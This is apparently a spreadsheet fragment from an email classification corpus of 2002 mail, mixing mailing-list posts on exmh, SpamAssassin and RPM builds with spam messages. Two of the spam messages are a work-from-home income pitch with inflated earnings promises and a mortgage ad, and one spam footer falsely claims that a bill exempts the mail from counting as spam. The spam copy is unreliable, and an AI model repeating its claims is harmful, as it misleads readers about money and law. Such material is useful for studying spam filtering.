 5JQdR" &gt;&lt;font color=3D"#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D=
 "1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height=3D"25"&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;tab=
 le width=3D100% border=3D0 cellspacing=3D2 cellpadding=3D1&gt; &lt;tr valign=3Dbo=
 ttom&gt; &lt;td width=3D75% height=3D31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=3DArial, He=
 lvetica, sans-serif size=3D2&gt;    Copyright 2002 CNET Networks, Inc. All rig=
 hts reserved.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=3D31 valign=3Dtop&gt; &lt;div al=
 ign=3Dright&gt; &lt;img src=3D"http://gserv-cnet.zdnet.com/clear/outbound.gif?APP=
 ID=3D2&amp;EMID=3D25136487&amp;NL=3De425&amp;ISSUE=3D2002-07-18" height=3D1 width=3D1&gt; =
    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, san=
 s-serif size=3D2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Da9-I=
 lqq-AUmKeyCjeNB1Y_B5RSLDRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: About Your Commissions...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;About your commissions&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" link="#336666" vlink="#336666" 
 alink="#336666"&gt;
 &lt;img src="http://track.4optinonly.com/tev.asp?eid=15185" height="1" width="1"&gt;
 &lt;CENTER&gt;
 &lt;div align="center" style="width: 459; height: 1152"&gt;
    &lt;div align="center"&gt;
      &lt;center&gt;
    &lt;table width="480" border="0" cellspacing="0" cellpadding="0"&gt;
      &lt;tr&gt;
        &lt;td width="480" height="135" valign="bottom"&gt;
          &lt;div align="left"&gt;&lt;a 
 href="http://track.4optinonly.com/clicktrack.asp?eid=15185&amp;url=http%3A%2F%2Fwww%2E4mailcash%2Ecom%2Freferralware%2Ephp%3Faff%3DASW118"&gt;&lt;img 
 src="http://64.251.7.133/15185/ig_top.jpg" width="480" height="135" 
 border="0"&gt;&lt;/a&gt;&lt;/div&gt;
        &lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td width="480" valign="top"&gt;
          &lt;table width="480" border="0" cellspacing="0" cellpadding="0"&gt;
            &lt;tr&gt;
              &lt;td width="8" background="IG_left.gif"&gt;&lt;img 
 src="http://64.251.7.133/15185/IG_spacer.gif" width="8" 
 height="8"&gt;&lt;/td&gt;
              &lt;td width="100%"&gt;
                &lt;p class=content align=left&gt;&lt;font face="Arial" size="2"&gt;That's
                  the first thing they said to me...&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face="Arial" 
 size="2"&gt;&amp;quot;About
                  your commissions, you might want to sit down...&amp;quot;. And then
                  they told me how big the check was and they were right, I was
                  glad I took a seat because I almost passed out.&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial size=2&gt;My name is
                    Matt Morrow and I've seen a lot of stuff over the 
 years but nothing
                  like this...&amp;nbsp; The marketing system I've been using for
                  the past 6 months to create this virtual flood of cash is about
                  to be released as the &amp;quot;&lt;b&gt;&lt;font color="#336666"&gt;Multiple
                  Income Stream Generator&lt;/font&gt;&lt;/b&gt;&amp;quot;.&amp;nbsp; Let me assure
                  you.... &lt;b&gt;you've never seen anything like it&lt;/b&gt;.&amp;nbsp; This
                  marketing system is the easiest way for anyone to make an
                  additional income that can grow to...well, the sky's 
 the limit!&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial 
 size=2&gt;&lt;b&gt;&lt;font color="#336666"&gt;YOUR
                  SPECIAL ARRANGEMENT... ARE &lt;i&gt;&lt;u&gt;YOU&lt;/u&gt;&lt;/i&gt; SITTING 
 DOWN?&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial 
 size=2&gt;The founders
                  of the company have decided to open this system up on 
 a &lt;font color="#336666"&gt;&lt;b&gt; LIMITED&lt;/b&gt;&lt;/font&gt;
                  Beta Tester level to prove that anyone can make money with this
                  system. I have
                    made a special arrangement to allow &lt;b&gt;YOU&lt;/b&gt; to be one of
                  the beta testers &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial size=2&gt;What does
                    this mean for you?&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial 
 size=2&gt;An opportunity
                  use this system before it is out of Beta Testing 
 phase to make an additional $50,000 - $250,000 per year.&lt;/font&gt;&lt;/p&gt;
                  &lt;p&gt;&lt;font face=Arial size=2&gt;This opportunity is 100% 
 RISK-FREE for a
                    limited time.&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial 
 size=2&gt;You will have
                    a REAL opportunity to make a never-ending cash flow 
 stream from
                    the comfort of your home, no matter what level of 
 computer skills
                    you now possess.&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial 
 size=2&gt;&lt;b&gt;&lt;font face=Arial size=2&gt;&lt;img 
 src="http://64.251.7.133/15185/IG_pic.jpg" width="131" height="185" 
 align="right"&gt;&lt;/font&gt;&lt;font color="#336666"&gt;NO
                    SPECIAL SKILLS, NO EXPERIENCE IS 
 NECESSARY!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial size=2&gt;I 
 have determined
                    this marketing system to be the easiest way for 
 anyone to make
                    an additional income&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial 
 size=2&gt;Current members
                    are making thousands every week!&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial size=2&gt;If you are
                    looking for a no-brainer solution to making an 
 additional $50,000
                    - $250,000 per year, this is your ticket, if you 
 qualify.&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&lt;font face=Arial 
 size=5&gt;&lt;b&gt;&lt;a 
 href="http://track.4optinonly.com/clicktrack.asp?eid=15185&amp;url=http%3A%2F%2Fwww%2E4mailcash%2Ecom%2Freferralware%2Ephp%3Faff%3DASW118"&gt;Click 
                    Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial" size="2"&gt; to see if
                  you qualify as a Beta Tester.&lt;/font&gt;&lt;/p&gt;
                  &lt;p class=content align=left&gt;&amp;nbsp;&lt;/p&gt;
                &lt;/div&gt;
              &lt;/td&gt;
              &lt;td width="8" background="IG_right.gif"&gt;
                &lt;div align="right"&gt;&lt;img 
 src="http://64.251.7.133/15185/IG_right.gif" width="8" 
 height="8"&gt;&lt;/div&gt;
              &lt;/td&gt;
            &lt;/tr&gt;
          &lt;/table&gt;
        &lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td width="480" height="8" valign="top"&gt;&lt;img 
 src="http://64.251.7.133/15185/IG_Bottom.gif" width="480" 
 height="12"&gt;&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/table&gt;
      &lt;/center&gt;
    &lt;/div&gt;
    &lt;table cellspacing=0 cellpadding=14 width=480 align=center border=0&gt;
      &lt;tbody&gt;
      &lt;tr&gt;
        &lt;td class=small valign=top&gt;&lt;font face=Arial size=1&gt;The previous 
 was an advertisement.
          The views expressed in it are those of the Referralware only. 
 &lt;b&gt;As with
          any business you could make more or less money than the 
 results described.
          &lt;/b&gt;Your results will be based on your individual monetary investments,
          business experience, expertise, and your level of desire. There are no
          guarantees concerning the level of success you may 
 experience, other than
          Referralware's product performance &amp;amp; return policy, if 
 applicable.&lt;/font&gt;
        &lt;/td&gt;
      &lt;/tr&gt;
      &lt;/tbody&gt;
    &lt;/table&gt;
    &lt;BR&gt;
 &lt;BR&gt;&lt;HR WIDTH="500"&gt;&lt;BR&gt;
 &lt;TABLE WIDTH="400" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
    &lt;TR&gt;
      &lt;TD WIDTH="100%"&gt;
        &lt;P&gt;&lt;FONT SIZE="-2" FACE="Verdana"&gt;You are receiving this email
        as a subscriber to the DealsUWant mailing list. To remove yourself
        from this and related email lists click here:&lt;BR&gt;
        &lt;a href="mailto:remove@4optinonly.com"&gt;UNSUBSCRIBE MY 
 EMAIL&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
        &lt;P&gt;&lt;FONT SIZE="-2" FACE="Verdana"&gt;&lt;BR&gt;
        Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
        301, Paragraph(a)(2)of S. 1618, a letter cannot be considered
        Spam if the sender includes contact information and a method
        of &amp;quot;removal&amp;quot;.&lt;/FONT&gt;
      &lt;/TD&gt;
    &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 20 Sep 2002 10:40:55 +0200
 Matthias Saou &lt;matthias@rpmforge.net&gt; wrote:
 # But as it's the primary mailer I use, you can be sure that as soon
 # as it's updated to 0.8.3, I'll update my build! :-)
 It got updated (;
 -- 
 Jesse Keating
 j2Solutions.net
 Mondo DevTeam (www.mondorescue.org)
 Was I helpful?  Let others know:
  http://svcs.affero.net/rm.php?r=jkeating
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I actually like Neale's X-Spam-Disposition header, I just wonder if maybe we
 should choose something with a different prefix than "X-Spam-" so that
 people don't confuse it with SpamAssassin, all of whose headers begin with
 that prefix.
 Also, some sort of version information would be useful.  Perhaps the CVS
 version number for the classifier module could be tacked on.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Saving money - this is the plan for you        9018
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;META http-equiv=3DContent-Type content=3Dtext/html;charset=3D=
 iso-8859-1&gt;&lt;STYLE type=3Dtext/css&gt;H1 { } TD {  FONT-SIZE: 12px; FONT-FAMIL=
 Y: Arial, Helvetica, sans-serif } P {  FONT-SIZE: 12px; FONT-FAMILY: Arial=
 , Helvetica, sans-serif }&lt;/STYLE&gt;&lt;META content=3D"MSHTML 6.00.2600.0" name=
 =3DGENERATOR&gt;&lt;/HEAD&gt;&lt;BODY bgColor=3D#ffffff&gt;&lt;TABLE cellSpacing=3D0 cellPad=
 ding=3D0 width=3D630 border=3D0&gt; &lt;TBODY&gt;&lt;TR&gt;&lt;TD bgColor=3D#000099 colSpan=3D=
 3&gt;&lt;/TD&gt;&lt;TR&gt;&lt;TD width=3D20 bgColor=3D#ffcc00 rowSpan=3D4&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD noW=
 rap bgColor=3D#000080 height=3D34&gt;&lt;DIV style=3D"FONT-SIZE: 24px; COLOR: #f=
 fb401; FONT-FAMILY: Arial Narrow; TEXT-ALIGN: center"&gt;Compare Now Online +=
  Save!&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD noWrap align=3Dtop bgColor=3D#000080 height=3D=
 34&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD vAlign=3Dtop align=3Dleft&gt; &lt;BLOCKQUOTE&gt;&lt;B&gt;&lt;BR&gt;&lt;FONT c=
 olor=3Dnavy size=3D4&gt;Dear Homeowner,&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT face=3Darial color=3D=
 red size=3D3&gt;&lt;B&gt;&lt;I&gt;"Now is the time to take advantage of falling interest =
 rates!&amp;nbsp;There is no advantage in waiting any longer."&lt;/I&gt;&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;=
 /FONT&gt;&lt;FONT size=3D3&gt;Refinance or consolidate high interest credit card de=
 bt into a low interest mortgage.&amp;nbsp; Mortgage interest is tax deductible=
 , whereas credit card interest is not.&lt;BR&gt;&lt;BR&gt;You can save thousands of do=
 llars over the course of your loan with just a 0.25% drop in your rate!&lt;BR=
 &gt;&lt;BR&gt;Our nationwide network of lenders have hundreds of different loan pro=
 grams to fit your current situation: &lt;BLOCKQUOTE&gt;&lt;FONT color=3Dred&gt;&lt;B&gt;&lt;UL&gt;=
 &lt;LI&gt;Refinance&lt;LI&gt;Second Mortgage&lt;LI&gt;Debt Consolidation&lt;LI&gt;Home Improvement=
 &lt;LI&gt;Purchase&amp;nbsp;&lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/BLOCKQUOTE&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;P align=3Dcenter&gt;=
 &lt;FONT size=3D4&gt;&lt;A href=3Dhttp://209.163.187.54/&gt;"Let us do the shopping fo=
 r you...IT IS FREE!&lt;BR&gt;CLICK HERE"&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;BR&gt;&lt;br&gt;&lt;br&gt;&lt;B&gt;Please&lt;A h=
 ref=3Dhttp://209.163.187.54/&gt;&lt;B&gt; CLICK HERE&lt;/B&gt;&lt;/A&gt; to fill out a quick fo=
 rm. Your request will be transmitted to our network of mortgage specialist=
 s who will respond with up to three independent offers.&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;B&gt;This=
  service is 100% free to home owners and new home buyers without any oblig=
 ation.&lt;/B&gt;&lt;P align=3Dcenter&gt;&lt;A href=3Dhttp://209.163.187.54&gt;&lt;IMG src=3Dhtt=
 p://209.163.187.54/images/eho.gif border=3D0&gt;&lt;/A&gt;&lt;/P&gt;&lt;/BLOCKQUOTE&gt;&lt;/FONT&gt;&lt;=
 /FONT&gt;&lt;/TD&gt;&lt;TD vAlign=3Dtop align=3Dright width=3D180&gt;&lt;BR&gt;&lt;BR&gt;&lt;P align=3Dc=
 enter&gt;&lt;FONT color=3Dblue size=3D1&gt;Data Flow&lt;/FONT&gt;&lt;A href=3Dhttp://209.163=
 .187.54/&gt;&lt;IMG src=3Dhttp://209.163.187.54/images/DataFlow.gif border=3D0&gt;&lt;=
 /A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BASEFONT size=3D2&gt;&lt;TABLE width=3D175 bgColor=3D#eeeeee&gt; &lt;TBODY=
 &gt;&lt;TR&gt;&lt;TD align=3Dmiddle colSpan=3D2&gt;National Averages&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD wid=
 th=3D91&gt;&lt;U&gt;Program&lt;/U&gt;&lt;/TD&gt;&lt;TD&gt;&lt;U&gt;Rate&lt;/U&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;30Y=
 ear Fixed&lt;/TD&gt;&lt;TD width=3D42&gt;6.375%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;15Year Fix=
 ed&lt;/TD&gt;&lt;TD width=3D42&gt;5.750%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;5Year Balloon&lt;/TD=
 &gt;&lt;TD width=3D42&gt;5.250%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;1/1Arm&lt;/TD&gt;&lt;TD width=3D=
 42&gt;4.250%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;5/1Arm&lt;/TD&gt;&lt;TD width=3D42&gt;5.625%&lt;/TD=
 &gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;&lt;FONT size=3D-2&gt;FHA30 Year Fixed&lt;/FONT&gt;&lt;/TD&gt;&lt;TD w=
 idth=3D42&gt;6.500%&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D91&gt;VA 30 Year Fixed&lt;/TD&gt;&lt;TD widt=
 h=3D42&gt;6.500%&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;FONT size=3D2&gt;&lt;P align=3Dright=
 &gt;"&lt;I&gt;You did all the shopping for me. Thank you!&lt;/I&gt;&lt;BR&gt;&lt;B&gt;-&lt;FONT size=3D1=
 &gt;T N. Cap.Beach, CA&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;P align=3Dright&gt;"&lt;I&gt;...You helped me=
  finance a new home and I got a very good deal.&lt;/I&gt;&lt;BR&gt;&lt;B&gt;-&lt;FONT size=3D1&gt;=
  R H. H.Beach, CA&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;&lt;P align=3Dright&gt;"&lt;I&gt;..it was easy, and qu=
 ick...!&lt;/I&gt;&lt;BR&gt;&lt;B&gt;-&lt;FONT size=3D1&gt;V S. N.P.Beach, WA&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/F=
 ONT&gt;&lt;/P&gt;&lt;/BASEFONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;To be removed from this list =
 please visit : http://211.154.134.26/remove/remove.htm&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;=
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; &gt; 
 &gt; &gt; &gt;   Dag&gt; but when procmail runs it it doesn't, presumably as it
 &gt; &gt; &gt;   Dag&gt; doesn't have the authorization to communicate with the
 &gt; &gt; &gt;   Dag&gt; laptop, beeing another user?
 &gt; &gt; &gt; 
 &gt; &gt; &gt; I don't know anything about the KDE sound server but I'd guess 
 &gt; &gt; &gt; your problem is the "environment" in which procmail runs.  You 
 &gt; &gt; &gt; don't say what procmail is running from.  In my case, for 
 &gt; &gt; &gt; example, procmail is run from fetchmail which is run by a cron 
 &gt; &gt; &gt; job.
 &gt; &gt; 
 &gt; &gt; Sorry about that,
 &gt; &gt; procmail is run by the qmail delivery agent to presort all mail
 &gt; &gt; I get.
 &gt; &gt; But anyway, I found an error message in procmail.log, which solved
 &gt; &gt; the problem.
 &gt; &gt; The following line in my delivery script seems to work fine now:
 &gt; &gt; 
 &gt; &gt; DISPLAY=&lt;laptop&gt;:0.0 artsplay &lt;soundfile&gt;
 &gt; 
 &gt; BTW, if you use exmhwrapper (found in the misc directory), you can generalize 
 &gt; this to
 &gt; 
 &gt; DISPLAY=`cat $HOME/.exmh/.display` artsplay &lt;soundfile&gt;
 Yes, but that probably means that you have to have exmh
 running on the laptop to get the notification?
 With exmh getting upset by two instances running at the
 same time, this creates the problem that I cannot  run to the
 closest compter to check out the new mail.
 But thanks for the hint, I might use that for some other
 hack ;-)
 BRGDS
 Dag
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.92,1.93
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
 In directory usw-pr-cvs1:/tmp/cvs-serv13563/lib/Mail/SpamAssassin
 Modified Files:
 	Conf.pm 
 Log Message:
 restricted version_tag
 Index: Conf.pm
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
 retrieving revision 1.92
 retrieving revision 1.93
 diff -b -w -u -d -r1.92 -r1.93
 --- Conf.pm	21 Aug 2002 16:01:08 -0000	1.92
 +++ Conf.pm	21 Aug 2002 16:27:06 -0000	1.93
 @@ -263,6 +263,7 @@
      if(/^version[-_]tag\s+(.*)$/) {
        my $tag = lc($1);
 +      $tag =~ tr/a-z0-9./_/c;
        foreach (@Mail::SpamAssassin::EXTRA_VERSION) {
          if($_ eq $tag) {
            $tag = undef;
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gillmor: Apple's fair-use friendly OS?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516100
 Date: Not supplied
 Dan Gillmor's column this week is all about Apple's burgeoning resistance to 
 the Hollywood onslaught on general-purpose computing: 
     Intel's doing it. Advanced Micro Devices is doing it. Microsoft is doing 
     it. 
     Apple Computer isn't. 
     What's Apple not doing? It's not -- at least so far -- moving toward an 
     anti-customer embrace with Hollywood's movie studios and the other members 
     of the powerful entertainment cartel.  
 Link[1] Discuss[2]
 [1] http://www.siliconvalley.com/mld/siliconvalley/business/columnists/4193839.htm
 [2] http://www.quicktopic.com/boing/H/LhvQTmDf6wi
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Sat, 24 Aug 2002 11:39:34 -0400
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 From: Somebody
 Subject: Re: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)
 And then there was the one from Prairie Home Companion:
 Q. Why is a viola larger than a violin?
 A. It  just looks that way because a violin player's head is bigger.
 &gt;--- begin forwarded text
 &gt;
 &gt;
 &gt;Status: RO
 &gt;Delivered-To: fork@spamassassin.taint.org
 &gt;From: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;
 &gt;Organization: Rose Garden Funeral of Sores
 &gt;User-Agent: Mutt/1.5.0 [-1214711651]
 &gt;To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;
 &gt;Subject: Re: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)
 &gt;Sender: fork-admin@xent.com
 &gt;Date: Wed, 24 Jul 2002 15:17:40 -0700
 &gt;
 &gt;There are so many good musician jokes.
 &gt;
 &gt;A couple of my favorites:
 &gt;
 &gt;Q. What's the difference between a viola and a violin?
 &gt;A. A viola burns longer.
 &gt;
 &gt;Q. What's the definition of a minor second?
 &gt;A. Two oboes playing in unison.
 &gt;
 &gt;- Joe
 &gt;
 &gt;
 &gt;http://xent.com/mailman/listinfo/fork
 &gt;
 &gt;--- end forwarded text
 &gt;
 &gt;
 &gt;--
 &gt;-----------------
 &gt;R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt;The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt;44 Farquhar Street, Boston, MA 02131 USA
 &gt;"... however it may deserve respect for its usefulness and antiquity,
 &gt;[predicting the end of the world] has not been found agreeable to
 &gt;experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
 -- 
 --- end forwarded text
 -- 
 R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 44 Farquhar Street, Boston, MA 02131 USA
 "Never underestimate the power of stupid people in large groups."
 --George Carlin
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Home Loan Alert, 6.25 30 YR Fixed hzo
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Covalent.NET
</t>
  </si>
  <si>
    <t xml:space="preserve">[1] Covalent works with Microsoft to provide ASP.NET capabilities for
 Apache 2.0.  ASP.NET actually has some really elegant tools for doing
 load testing and analysis. Perhaps Microsoft's desire to embrace, extend, and
 extinguish comes from a scathing Gartner report recommending not to deploy
 IIS for enterprise applications at all.   Now users get the best of both
 worlds: all the development tools of ASP.Net and the security and reliability
 of Apache.
 Greg
 -- 
 Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
 Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.com
 [1]http://www.infoworld.com/articles/hn/xml/02/07/25/020725hnapachenet.xml
 &gt; With help from Microsoft in Redmond, Wash., Covalent said it was able to develop a 
 &gt; module for its Enterprise Ready Server that would allow ASP.Net applications to run on 
 &gt; Apache 2.0. However, organizations that use the freely available Web server won't be able 
 &gt; to run ASP.Net applications unless they purchase Covalent's software. Zemlin said that the 
 &gt; company doesn't plan to release an open-source version of its .Net module.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">In message &lt;5378.1027548783@dimebox&gt;, Hal DeVore writes:
 &gt;
 &gt;&gt;&gt;&gt;&gt;&gt; On Wed, 24 Jul 2002, "Chris" == Chris Garrigues wrote:
 &gt;
 &gt;  Chris&gt; Am I the only one for whom typing control-L to the main
 &gt;  Chris&gt; window causes this error?
 &gt;
 &gt;Getting it here too on a copy I haven't updated from CVS since 
 &gt;about May sometime.
 It's in 2.5 as well.
 //Christer
 -- 
 | Sys admin @ MEDIC              WWW: http://www.dtek.chalmers.se/            |
 | Email: mort@dtek.chalmers.se   Phone: (0)31 772 5431, (0)707 53 57 57	      |
 "I fought the loa and the loa won, I fought the loa and the loa won..."
         -- Dave Aronsson, a.s.r.
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Jump Start
</t>
  </si>
  <si>
    <t xml:space="preserve">--6700390.1026560924954.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Comics by E-mail,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a text-only subscription, modify your account
 preferences at 
 http://www.comics.com/dailycomics/modify
 --6700390.1026560924954.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 &lt;!--            *********************************************   --&gt;
 &lt;!--            * Designed by UnitedMedia.com               *   --&gt;
 &lt;!--            * 02/18/00                                  *   --&gt;
 &lt;!--            *********************************************   --&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Comics.com - Comics E-mail - Jump Start&lt;/TITLE&gt;
 &lt;META NAME="description" CONTENT="Get comics by e-mail daily (Monday - Saturday), subscriptions are free, great merchandise with your favorite characters."&gt;
 &lt;META NAME="keywords" CONTENT="Subscribe, Comics e-mail, Get Fuzzy, Peanuts, For Better or For Worse, Rose Is Rose, Pearls Before Swine, Herman, Monty, Luann, 9 Chickweed Lane, Frank and Ernest."&gt;
 &lt;meta http-equiv="pragma" content="no-cache"&gt;
 &lt;META HTTP-EQUIV="expires" CONTENT="0"&gt;
 &lt;meta http-equiv="Cache-control" content="no-cache"&gt;
 &lt;script language="JavaScript"&gt;
 &lt;!--
 function rand(n) {
 seed = (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now = new Date ();
 var seed = now.getTime() % 0xffffffff;
 var same = rand(1000);
 function OpenMediaWindow(mURL) {
 			if (parseInt(navigator.appVersion.charAt(0)) &gt;= 3) {
 				window.open(mURL,"NewWindow","width=810,height=450,resizable=yes,toolbar=yes,status=yes,menubar=yes,scrollbars=yes,location=yes,left=20,top=20");
 				}
 		}
 //--&gt;
 &lt;/script&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR="#336699" LINK="#000000" VLINK="#000000" ALINK="#336699" TEXT="#336699" MARGINWIDTH="8" MARGINHEIGHT="15" LEFTMARGIN="8" TOPMARGIN="15"&gt;
 &lt;Table width="100%" bgcolor="#336699" border="0"&gt;
 	&lt;tr&gt;
 		&lt;td bgcolor="#336699"&gt;
 &lt;!-- BEGIN BANNER AD TABLE --&gt;
 &lt;TABLE WIDTH="634" CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 	&lt;TR VALIGN="TOP"&gt;
